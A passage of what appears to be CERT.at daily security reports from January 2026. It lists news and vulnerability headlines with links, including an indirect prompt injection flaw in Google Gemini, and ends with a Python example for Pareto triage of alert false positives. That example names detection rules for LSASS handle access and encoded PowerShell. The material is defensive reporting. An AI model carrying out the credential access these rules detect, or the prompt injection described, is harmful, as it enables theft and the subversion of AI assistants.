Co-Handler:  Michael Schlagenhaufer


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Google Gemini Prompt Injection Flaw Exposed Private Calendar Data via Malicious Invites&lt;/h3&gt;

Cybersecurity researchers have disclosed details of a security flaw that leverages indirect prompt injection targeting Google Gemini as a way to bypass authorization guardrails and use Google Calendar as a data extraction mechanism.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/google-gemini-prompt-injection-flaw.html&quot;&gt;https://thehackernews.com/2026/01/google-gemini-prompt-injection-flaw.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Cloudflare Fixes ACME Validation Bug Allowing WAF Bypass to Origin Servers&lt;/h3&gt;

Cloudflare has addressed a security vulnerability impacting its Automatic Certificate Management Environment (ACME) validation logic that made it possible to bypass security controls and access origin servers. [..] The web infrastructure company said it found no evidence that the vulnerability was ever exploited in a malicious context. [..] The vulnerability was addressed by Cloudflare on October 27, 2025, with a code change that serves the response and disables WAF features only when the request matches a valid ACME HTTP-01 challenge token for that hostname.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/cloudflare-fixes-acme-validation-bug.html&quot;&gt;https://thehackernews.com/2026/01/cloudflare-fixes-acme-validation-bug.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Hackers Use LinkedIn Messages to Spread RAT Malware Through DLL Sideloading&lt;/h3&gt;

Cybersecurity researchers have uncovered a new phishing campaign that exploits social media private messages to propagate malicious payloads, likely with the intent to deploy a remote access trojan (RAT).
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/hackers-use-linkedin-messages-to-spread.html&quot;&gt;https://thehackernews.com/2026/01/hackers-use-linkedin-messages-to-spread.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;EU Commission working on open-source strategy and asking the community for feedback&lt;/h3&gt;

Individuals and groups have until 3 February to submit comments.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.derstandard.at/story/3000000304870/eu-kommission-arbeitet-an-open-source-strategie-und-fragt-community-nach-feedback&quot;&gt;https://www.derstandard.at/story/3000000304870/eu-kommission-arbeitet-an-open-source-strategie-und-fragt-community-nach-feedback&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft &amp; Anthropic MCP Servers At Risk of RCE, Cloud Takeovers&lt;/h3&gt;

Researchers found the popular model context protocol (MCP) servers, which are integral components of AI services, carry serious vulnerabilities. [..] When they analyzed more than 7,000 MCP servers, they found that the same SSRF exposure might be latent in around 36.7% of all MCP servers on the Web today. [..] The company reported its findings to Anthropic last June. Half a year later, in December, Anthropic released the 2025.12.18 version of the Git MCP server, which better enforced path validation (in response to CVE-2025-68145), addressed argument handling (CVE-2025-68144), and completely removed the git_init tool (CVE-2025-68143).
&lt;p /&gt;
&lt;A HREF=&quot;https://www.darkreading.com/application-security/microsoft-anthropic-mcp-servers-risk-takeovers&quot;&gt;https://www.darkreading.com/application-security/microsoft-anthropic-mcp-servers-risk-takeovers&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Inside a Multi-Stage Windows Malware Campaign&lt;/h3&gt;

The attack begins with social engineering lures delivered via business-themed documents crafted to appear routine and benign. These documents and accompanying scripts serve as visual distractions, diverting victims to fake tasks or status messages while malicious activity runs silently in the background.
&lt;p /&gt;
&lt;A HREF=&quot;https://feeds.fortinet.com/~/940900697/0/fortinet/blogs~Inside-a-MultiStage-Windows-Malware-Campaign&quot;&gt;https://feeds.fortinet.com/~/940900697/0/fortinet/blogs~Inside-a-MultiStage-Windows-Malware-Campaign&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Security vulnerability at TP-Link: Surveillance cameras crackable via password reset&lt;/h3&gt;

Network equipment manufacturer TP-Link warns of a dangerous security vulnerability in its Vigi surveillance cameras. [..] According to the vulnerability description, the flaw stems from a bug in the password recovery function of the web interface of affected cameras. [..] Using CVE-2026-0629, attackers can reset the admin password without any verification taking place. [..] To exploit CVE-2026-0629, attackers do need access to the local network to which the targeted camera is connected.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/tp-link-admin-konten-zahlloser-ueberwachungskameras-knackbar-2601-204385.html&quot;&gt;https://www.golem.de/news/tp-link-admin-konten-zahlloser-ueberwachungskameras-knackbar-2601-204385.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security updates for Tuesday&lt;/h3&gt;

Security updates have been issued by AlmaLinux (gpsd-minimal, jmc, kernel, kernel-rt, and net-snmp), Debian (apache-log4j2 and dcmtk), Fedora (exim, gpsd, mysql8.0, mysql8.4, python-biopython, and rust-lru), Mageia (firefox, nss and thunderbird), Oracle (container-tools:rhel8, gpsd-minimal, jmc, kernel, net-snmp, and uek-kernel), Red Hat (net-snmp), SUSE (chromium, go, harfbuzz-devel, kernel, libsoup, rust1.91, rust1.92, and thunderbird), and Ubuntu (apache2, avahi, and python-urllib3).
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1055152/&quot;&gt;https://lwn.net/Articles/1055152/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;VU#244846: Server-Side Template Injection (SSTI) vulnerability exists in Genshi&lt;/h3&gt;

A Server-Side Template Injection (SSTI) vulnerability exists in the Genshi template engine due to unsafe evaluation of template expressions. [..] Genshi is a Python library developed by Edgewall; it provides an integrated set of components for parsing, generating, and processing HTML, XML, or other textual content for output generation on the web. [..] If an attacker can influence or inject template expressions, this vulnerability allows arbitrary code execution with the privileges of the running application. [..] At the time of publication, Genshi has not released an update addressing this issue.
&lt;p /&gt;
&lt;A HREF=&quot;https://kb.cert.org/vuls/id/244846&quot;&gt;https://kb.cert.org/vuls/id/244846&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;VU#271649: Stack-based buffer overflow in libtasn1 versions v4.20.0 and earlier&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://kb.cert.org/vuls/id/271649&quot;&gt;https://kb.cert.org/vuls/id/271649&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Beckhoff Security Advisory 2025-002&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://download.beckhoff.com/download/document/product-security/Advisories/advisory-2025-002.pdf&quot;&gt;https://download.beckhoff.com/download/document/product-security/Advisories/advisory-2025-002.pdf&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-01-20T18:31:21Z</dc:date></entry><entry><title>Tageszusammenfassung - 19.01.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/1/tagesberichte-19012026"/><author><name>CERT.at</name></author><updated>2026-01-19T18:20:51Z</updated><published>2026-01-19T18:20:51Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Friday 16-01-2026 18:00 - Monday 19-01-2026 18:00
Handler:     Michael Schlagenhaufer
Co-Handler:  Guenes Holler


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;StealC hackers hacked as researchers hijack malware control panels&lt;/h3&gt;

A cross-site scripting (XSS) flaw in the web-based control panel used by operators of the StealC info-stealing malware allowed researchers to observe active sessions and gather intelligence on the attackers' hardware.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/stealc-hackers-hacked-as-researchers-hijack-malware-control-panels/&quot;&gt;https://www.bleepingcomputer.com/news/security/stealc-hackers-hacked-as-researchers-hijack-malware-control-panels/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Autotype: Windows 11 update breaks popular KeePass feature&lt;/h3&gt;

Since the January Patch Tuesday, KeePass can no longer insert credentials via Autotype in some Windows dialogs. A fix is not to be expected.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/autotype-windows-11-update-macht-beliebte-keepass-funktion-kaputt-2601-204337.html&quot;&gt;https://www.golem.de/news/autotype-windows-11-update-macht-beliebte-keepass-funktion-kaputt-2601-204337.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;What Happened After Security Researchers Found 60 Flock Cameras Livestreaming to the Internet&lt;/h3&gt;

A couple months ago, YouTuber Benn Jordan &quot;found vulnerabilities in some of Flock's license plate reader cameras,&quot; reports 404 Media's Jason Koebler. &quot;He reached out to me to tell me he had learned that some of Flock's Condor cameras were left live-streaming to the open internet.&quot;
&lt;p /&gt;
&lt;A HREF=&quot;https://yro.slashdot.org/story/26/01/17/0718211/what-happened-after-security-researchers-found-60-flock-cameras-livestreaming-to-the-internet?utm_source=rss1.0mainlinkanon&amp;utm_medium=feed&quot;&gt;https://yro.slashdot.org/story/26/01/17/0718211/what-happened-after-security-researchers-found-60-flock-cameras-livestreaming-to-the-internet?utm_source=rss1.0mainlinkanon&amp;utm_medium=feed&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;China-Linked APT Exploited Sitecore Zero-Day in Critical Infrastructure Intrusions&lt;/h3&gt;

A threat actor likely aligned with China has been observed targeting critical infrastructure sectors in North America since at least last year.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/china-linked-apt-exploits-sitecore-zero.html&quot;&gt;https://thehackernews.com/2026/01/china-linked-apt-exploits-sitecore-zero.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures&lt;/h3&gt;

Cybersecurity researchers have disclosed details of an ongoing campaign dubbed KongTuke that used a malicious Google Chrome extension masquerading as an ad blocker to deliberately crash the web browser and trick victims into running arbitrary commands using ClickFix-like lures to deliver a previously undocumented remote access trojan (RAT) dubbed ModeloRAT.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/crashfix-chrome-extension-delivers.html&quot;&gt;https://thehackernews.com/2026/01/crashfix-chrome-extension-delivers.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Missing postal code? Message from DPD is a phishing trap&lt;/h3&gt;

A classic of online fraud. A parcel service gets in touch out of the blue. Allegedly, a delivery attempt failed because of a missing postal code. In reality, criminals are trying to obtain credit card data via a fake portal.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/dpd-phishing-falle/&quot;&gt;https://www.watchlist-internet.at/news/dpd-phishing-falle/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Windows January 2026 update replaces Secure Boot certificates&lt;/h3&gt;

In June 2026, UEFI Secure Boot certificates for Windows expire. In October 2026, the next expiring UEFI Secure Boot certificate follows. With the Patch Tuesday updates of 13 January 2026, Microsoft has once again attempted to replace the Secure Boot certificate in UEFI. Here is a brief review of the current state of affairs.
&lt;p /&gt;
&lt;A HREF=&quot;https://borncity.com/blog/2026/01/17/windows-januar-2026-update-tauscht-secure-boot-zertifikate/&quot;&gt;https://borncity.com/blog/2026/01/17/windows-januar-2026-update-tauscht-secure-boot-zertifikate/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;From Extension to Infection: An In-Depth Analysis of the Evelyn Stealer Campaign Targeting Software Developers&lt;/h3&gt;

This blog entry provides an in-depth analysis of the multistage delivery of the Evelyn information stealer, which was used in a campaign targeting software developers.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.trendmicro.com/en_us/research/26/a/analysis-of-the-evelyn-stealer-campaign.html&quot;&gt;https://www.trendmicro.com/en_us/research/26/a/analysis-of-the-evelyn-stealer-campaign.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Hackers Exploiting PDF24 App to Deploy Stealthy PDFSIDER Backdoor&lt;/h3&gt;

Resecurity has identified PDFSIDER malware that exploits the legitimate PDF24 App to covertly steal data and allow remote access. Learn how this APT-level campaign targets corporate networks through spear-phishing and encrypted communications.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/hackers-exploit-pdf24-app-pdfsider-backdoor/&quot;&gt;https://hackread.com/hackers-exploit-pdf24-app-pdfsider-backdoor/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Blink and you'll miss them: 6-day certificates are here!&lt;/h3&gt;

What a great way to start 2026! Let's Encrypt have now made their short-lived certificates available, so you can go and start using them right away.
&lt;p /&gt;
&lt;A HREF=&quot;https://scotthelme.ghost.io/blink-and-youll-miss-them-6-day-certificates-are-here/&quot;&gt;https://scotthelme.ghost.io/blink-and-youll-miss-them-6-day-certificates-are-here/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft begins identifying insecure RC4 encryption&lt;/h3&gt;

The Windows security updates from January herald the removal of insecure RC4 encryption. One vulnerability requires action.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11145332&quot;&gt;https://heise.de/-11145332&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Malware Peddlers Are Now Hijacking Snap Publisher Domains&lt;/h3&gt;

tl;dr: There's a relentless campaign by scammers to publish malware in the Canonical Snap Store. Some gets caught by automated filters, but plenty slips through. Recently, these miscreants have changed tactics - they're now registering expired domains belonging to legitimate snap publishers, taking over their accounts, and pushing malicious updates to previously trustworthy applications. This is a significant escalation.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.popey.com/2026/01/malware-purveyors-taking-over-published-snap-email-domains/&quot;&gt;https://blog.popey.com/2026/01/malware-purveyors-taking-over-published-snap-email-domains/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;TPM on Embedded Systems: Pitfalls and Caveats&lt;/h3&gt;

Trusted Platform Module (TPM) chips have been around since the release of the TPM 1.2 specification more than 20 years ago, and the TPM 2.0 specification was released in 2014. The technology is now seeing widespread adoption in various computing sectors. TPMs have been a standard feature in PCs, particularly notebooks, for some time. With integration into tools like systemd's tooling for LUKS/dm-crypt and legal requirements like the EU's CRA, TPM functionality is also now making its way into the embedded Linux sector. In this post, we'll highlight common pitfalls and considerations for using TPM chips on embedded devices.
&lt;p /&gt;
&lt;A HREF=&quot;https://sigma-star.at/blog/2026/01/tpm-on-embedded-systems-pitfalls-and-caveats/&quot;&gt;https://sigma-star.at/blog/2026/01/tpm-on-embedded-systems-pitfalls-and-caveats/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;How to Remove Saved Passwords From Google Chrome (And Why You Should)&lt;/h3&gt;

It usually starts with a small convenience. You log into a site once, Chrome offers to remember the password, and you click &quot;Save&quot; without thinking twice. Weeks turn into months, devices multiply, and before you know it, your browser knows more about your digital life than you do. This is exactly how many users end up relying on Chrome's built-in tools without ever learning how to delete passwords from Chrome when it actually matters.
&lt;p /&gt;
&lt;A HREF=&quot;https://thecyberexpress.com/how-to-delete-saved-passwords-in-google-chrome/&quot;&gt;https://thecyberexpress.com/how-to-delete-saved-passwords-in-google-chrome/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;All In One SEO Plugin Flaw Exposes AI Token to Low-Privilege WordPress Users&lt;/h3&gt;

A newly disclosed security vulnerability in the All In One SEO ecosystem has drawn attention across the WordPress community due to its potential reach and impact. The flaw affects the widely used AIOSEO plugin, which is active on more than 3 million WordPress websites. It allows low-privileged users to access a site-wide AI access token tied to the plugin's artificial intelligence features.
&lt;p /&gt;
&lt;A HREF=&quot;https://thecyberexpress.com/all-in-one-seo-wordpress-ai-token/&quot;&gt;https://thecyberexpress.com/all-in-one-seo-wordpress-ai-token/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Security updates for Monday&lt;/h3&gt;

Security updates have been issued by AlmaLinux (cups, libpq, libsoup3, podman, and postgresql16), Debian (ffmpeg, gpsd, python-urllib3, and thunderbird), Fedora (chromium, foomuuri, forgejo, freerdp, harfbuzz, libtpms, musescore, python-biopython, and python3.12), Mageia (gimp, libpng, nodejs, and python-urllib3), and SUSE (alloy, avahi, bind, chromedriver, chromium, cpp-httplib, docker, erlang, fluidsynth, freerdp, go-sendxmpp, govulncheck-vulndb, kernel, libwireshark19, NetworkManager-applet-l2tp, python, python311-virtualenv, thunderbird, and zk).
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1054992/&quot;&gt;https://lwn.net/Articles/1054992/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Unauthorized access possible: Vulnerabilities in Dell's OneFS NAS operating system&lt;/h3&gt;

Dell's NAS operating system PowerScale OneFS can be attacked through several security vulnerabilities. Hardened releases are available for download.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11145497&quot;&gt;https://heise.de/-11145497&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Wireshark 4.6.3 Released, (Sat, Jan 17th)&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://isc.sans.edu/diary/rss/32636&quot;&gt;https://isc.sans.edu/diary/rss/32636&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;K000159600: Rack vulnerability CVE-2022-30123&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://my.f5.com/manage/s/article/K000159600&quot;&gt;https://my.f5.com/manage/s/article/K000159600&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;K000159077: GNU Tar vulnerability CVE-2019-9923&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://my.f5.com/manage/s/article/K000159077&quot;&gt;https://my.f5.com/manage/s/article/K000159077&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-01-19T18:20:51Z</dc:date></entry><entry><title>Tageszusammenfassung - 16.01.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/1/tagesberichte-16012026"/><author><name>CERT.at</name></author><updated>2026-01-16T18:29:42Z</updated><published>2026-01-16T18:29:42Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Thursday 15-01-2026 18:00 - Friday 16-01-2026 18:00
Handler:     Alexander Riepl
Co-Handler:  Felician Fuchs


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Root access via bit flip: Flaw in AMD CPUs allows break-ins into cloud VMs&lt;/h3&gt;

A new attack technique called Stackwarp lets attackers hijack virtual machines via AMD CPUs. Cloud environments in particular are at risk.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/per-bitflip-zum-root-zugriff-luecke-in-amd-cpus-ermoeglicht-einbruch-in-cloud-vms-2601-204279.html&quot;&gt;https://www.golem.de/news/per-bitflip-zum-root-zugriff-luecke-in-amd-cpus-ermoeglicht-einbruch-in-cloud-vms-2601-204279.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;AWS CodeBuild Misconfiguration Exposed GitHub Repos to Potential Supply Chain Attacks&lt;/h3&gt;

A critical misconfiguration in Amazon Web Services (AWS) CodeBuild could have allowed complete takeover of the cloud service provider's own GitHub repositories, including its AWS JavaScript SDK, putting every AWS environment at risk.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/aws-codebuild-misconfiguration-exposed.html&quot;&gt;https://thehackernews.com/2026/01/aws-codebuild-misconfiguration-exposed.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Five Malicious Chrome Extensions Impersonate Workday and NetSuite to Hijack Accounts&lt;/h3&gt;

Cybersecurity researchers have discovered five new malicious Google Chrome web browser extensions that masquerade as human resources (HR) and enterprise resource planning (ERP) platforms like Workday, NetSuite, and SuccessFactors to take control of victim accounts.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/five-malicious-chrome-extensions.html&quot;&gt;https://thehackernews.com/2026/01/five-malicious-chrome-extensions.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Chinese spies used Maduro's capture as a lure to phish US govt agencies&lt;/h3&gt;

What's next for Venezuela? Click on the file and see. What policy wonk wouldn't want to click on an attachment promising to unveil US plans for Venezuela? Chinese cyberspies used just such a lure to target US government agencies and policy-related organizations in a phishing campaign that began just days after an American military operation captured Venezuelan President Nicolás Maduro.
&lt;p /&gt;
&lt;A HREF=&quot;https://go.theregister.com/feed/www.theregister.com/2026/01/15/chinese_spies_used_maduros_capture/&quot;&gt;https://go.theregister.com/feed/www.theregister.com/2026/01/15/chinese_spies_used_maduros_capture/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Bankrupt scooter startup left one private key to rule them all&lt;/h3&gt;

An Estonian e-scooter owner locked out of his own ride after the manufacturer went bust did what any determined engineer might do. He reverse-engineered it, and claims he ended up discovering the master key that unlocks every scooter the company ever sold.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.theregister.com/2026/01/16/bankrupt_scooter_startup_key/&quot;&gt;https://www.theregister.com/2026/01/16/bankrupt_scooter_startup_key/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;RondoDox botnet linked to large-scale exploit of critical HPE OneView bug&lt;/h3&gt;

Check Point observes 40K+ attack attempts within hours, with government organizations under fire. A critical HPE OneView flaw is now being exploited at scale, with Check Point tying mass, automated attacks to the RondoDox botnet.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.theregister.com/2026/01/16/rondodox_botnet_hpe_oneview/&quot;&gt;https://www.theregister.com/2026/01/16/rondodox_botnet_hpe_oneview/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;German cops add Black Basta boss to EU most-wanted list&lt;/h3&gt;

Ransomware kingpin who escaped Armenian custody is believed to be lying low back home. German cops have added Russian national Oleg Evgenievich Nefekov to their list of most-wanted criminals for his services to ransomware.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.theregister.com/2026/01/16/black_basta_boss_wanted/&quot;&gt;https://www.theregister.com/2026/01/16/black_basta_boss_wanted/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Patch now! Critical Cisco vulnerability exploited since December 2025&lt;/h3&gt;

Attackers are compromising Cisco Secure Email Gateway and Secure Email and Web Manager through a vulnerability that yields root. Security updates are now available.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Jetzt-patchen-Kritische-Cisco-Luecke-seit-Dezember-2025-ausgenutzt-11143359.html&quot;&gt;https://www.heise.de/news/Jetzt-patchen-Kritische-Cisco-Luecke-seit-Dezember-2025-ausgenutzt-11143359.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;The learning threat: Predator spyware is more sophisticated than thought&lt;/h3&gt;

Intellexa's Predator spyware extracts valuable data even from failed infection attempts and specifically hunts IT security researchers.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Die-lernende-Bedrohung-Predator-Spyware-ist-raffinierter-als-gedacht-11144402.html&quot;&gt;https://www.heise.de/news/Die-lernende-Bedrohung-Predator-Spyware-ist-raffinierter-als-gedacht-11144402.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Chinese hackers targeting &quot;high value&quot; North American critical infrastructure, Cisco says&lt;/h3&gt;

Chinese hackers successfully breached multiple critical infrastructure organizations in North America over the last year using a combination of compromised credentials and exploitable servers, researchers at Cisco Talos found.
&lt;p /&gt;
&lt;A HREF=&quot;https://therecord.media/china-hackers-apt-cisco-talos&quot;&gt;https://therecord.media/china-hackers-apt-cisco-talos&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Canadian investment regulator confirms hackers hit 750,000 investors&lt;/h3&gt;

The nongovernmental Canadian Investment Regulatory Organization, which oversees the country's debt and equity marketplaces as well as some financial institutions, released details about an August 2025 data breach.
&lt;p /&gt;
&lt;A HREF=&quot;https://therecord.media/canada-ciro-investing-regulator-confirms-data-breach&quot;&gt;https://therecord.media/canada-ciro-investing-regulator-confirms-data-breach&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation&lt;/h3&gt;

CVE-2025-55182 is a CVSS 10.0 pre-authentication RCE affecting React Server Components. Amid the flood of fake proofs-of-concept, scanners, exploits, and widespread misconceptions, this technical analysis intends to cut through the noise.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.trendmicro.com/en_us/research/25/l/CVE-2025-55182-analysis-poc-itw.html&quot;&gt;https://www.trendmicro.com/en_us/research/25/l/CVE-2025-55182-analysis-poc-itw.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;New PayPal Scam Sends Verified Invoices With Fake Support Numbers&lt;/h3&gt;

Scammers are using verified PayPal invoices to launch callback phishing attacks. Learn how the &quot;Alexzander&quot; invoice bypasses Google filters.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/paypal-scam-verified-invoices-fake-support-numbers/&quot;&gt;https://hackread.com/paypal-scam-verified-invoices-fake-support-numbers/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Operation Endgame: Dutch Police Arrest Alleged AVCheck Operator&lt;/h3&gt;

Dutch police arrest the alleged AVCheck operator at Schiphol as part of Operation Endgame, a global effort targeting malware services and cybercrime.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/operation-endgame-dutch-police-arrest-avcheck-operator/&quot;&gt;https://hackread.com/operation-endgame-dutch-police-arrest-avcheck-operator/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Closing the Door on Net-NTLMv1: Releasing Rainbow Tables to Accelerate Protocol Deprecation&lt;/h3&gt;

Mandiant is publicly releasing a comprehensive dataset of Net-NTLMv1 rainbow tables to underscore the urgency of migrating away from this outdated protocol. Despite Net-NTLMv1 having been deprecated and known to be insecure for over two decades, with cryptanalysis dating back to 1999, Mandiant consultants continue to identify its use in active environments.
&lt;p /&gt;
&lt;A HREF=&quot;https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables/&quot;&gt;https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;The reporting portal in the AWS cloud: why, BSI?&lt;/h3&gt;

It is good that the BSI is offering a new IT security portal. But does it really have to run in the AWS cloud, asks Tobias Glemser.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11142071&quot;&gt;https://heise.de/-11142071&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;How to Use Pareto Principle to Fine-Tune Alerts and Reduce False Positives Wisely&lt;/h3&gt;

False positives were not only consuming analyst time - they were also diluting attention and slowing response on the few alerts that actually mattered.
&lt;p /&gt;
&lt;A HREF=&quot;https://detect.fyi/how-to-use-pareto-principle-to-fine-tune-alerts-and-reduce-false-positives-wisely-2c171356fe5b&quot;&gt;https://detect.fyi/how-to-use-pareto-principle-to-fine-tune-alerts-and-reduce-false-positives-wisely-2c171356fe5b&lt;/a&gt;
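As an added example (code written for this digest, not taken from the detect.fyi article), the Python below applies the approach to constructed sample data: closed alerts carrying the rule that fired, the analyst verdict and a context attribute. It finds the few rules that account for 80% of all false positives, then for each of them checks whether a single context dominates the false positives (a targeted exclusion candidate) and whether the rule also has true positives (in which case it is tuned, never disabled). Field names, rule names and the 80% / 60% thresholds are assumptions.

```python
"""Pareto triage of false positives by detection rule.

Added example on constructed data; not code from the article. Each closed
alert is a dict with the rule that fired, the analyst verdict and a context
attribute (here the process or agent that triggered it); all assumptions.
"""
from collections import Counter
import operator


def _alerts(rule, verdict, context, n):
    return [{"rule": rule, "verdict": verdict, "context": context}] * n


# Constructed sample: 16 false positives and 4 true positives across 5 rules.
SAMPLE_ALERTS = (
    _alerts("PowerShell encoded command", "false_positive", "sccm-agent", 6)
    + _alerts("PowerShell encoded command", "false_positive", "user-script", 2)
    + _alerts("PowerShell encoded command", "true_positive", "unknown-binary", 1)
    + _alerts("LSASS handle access", "false_positive", "edr-scanner", 5)
    + _alerts("Rare scheduled task", "false_positive", "backup-agent", 2)
    + _alerts("DNS TXT long query", "false_positive", "mail-gateway", 1)
    + _alerts("DNS TXT long query", "true_positive", "beacon.exe", 1)
    + _alerts("New local admin account", "true_positive", "net.exe", 2)
)


def false_positive_counts(alerts):
    return Counter(a["rule"] for a in alerts if a["verdict"] == "false_positive")


def pareto_rules(alerts, share=0.8):
    """Rules that together produce at least `share` of all false positives,
    largest contributor first, as (rule, fp_count, fp_fraction) tuples."""
    fp = false_positive_counts(alerts)
    total = sum(fp.values())
    chosen, cumulative = [], 0
    for rule, n in fp.most_common():
        chosen.append((rule, n, n / total))
        cumulative += n
        if operator.ge(cumulative / total, share):  # reached the target share
            break
    return chosen


def rule_profile(alerts, rule):
    """False/true positive counts and the context that dominates the FPs."""
    fps = [a for a in alerts if a["rule"] == rule and a["verdict"] == "false_positive"]
    tps = [a for a in alerts if a["rule"] == rule and a["verdict"] == "true_positive"]
    top_context, top_n = (None, 0)
    if fps:
        top_context, top_n = Counter(a["context"] for a in fps).most_common(1)[0]
    return {
        "rule": rule,
        "fp": len(fps),
        "tp": len(tps),
        "top_context": top_context,
        "top_context_share": top_n / len(fps) if fps else 0.0,
    }


def recommend(alerts, share=0.8, dominance=0.6):
    """Tuning action per Pareto rule. A dominant context gets a targeted
    exclusion; scattered FPs mean the rule logic itself needs revisiting; a
    rule with true positives is never a candidate for disabling."""
    actions = []
    for rule, _n, _frac in pareto_rules(alerts, share):
        p = rule_profile(alerts, rule)
        if operator.ge(p["top_context_share"], dominance):
            action = "add exclusion for context " + repr(p["top_context"])
        else:
            action = "false positives spread across contexts: revisit rule logic"
        if p["tp"]:
            action += "; keep enabled, rule has true positives"
        actions.append((rule, action))
    return actions


if __name__ == "__main__":
    for rule, n, frac in pareto_rules(SAMPLE_ALERTS):
        print(f"{n:3d} FPs ({frac:.0%})  {rule}")
    for rule, action in recommend(SAMPLE_ALERTS):
        print(f"{rule}: {action}")
```

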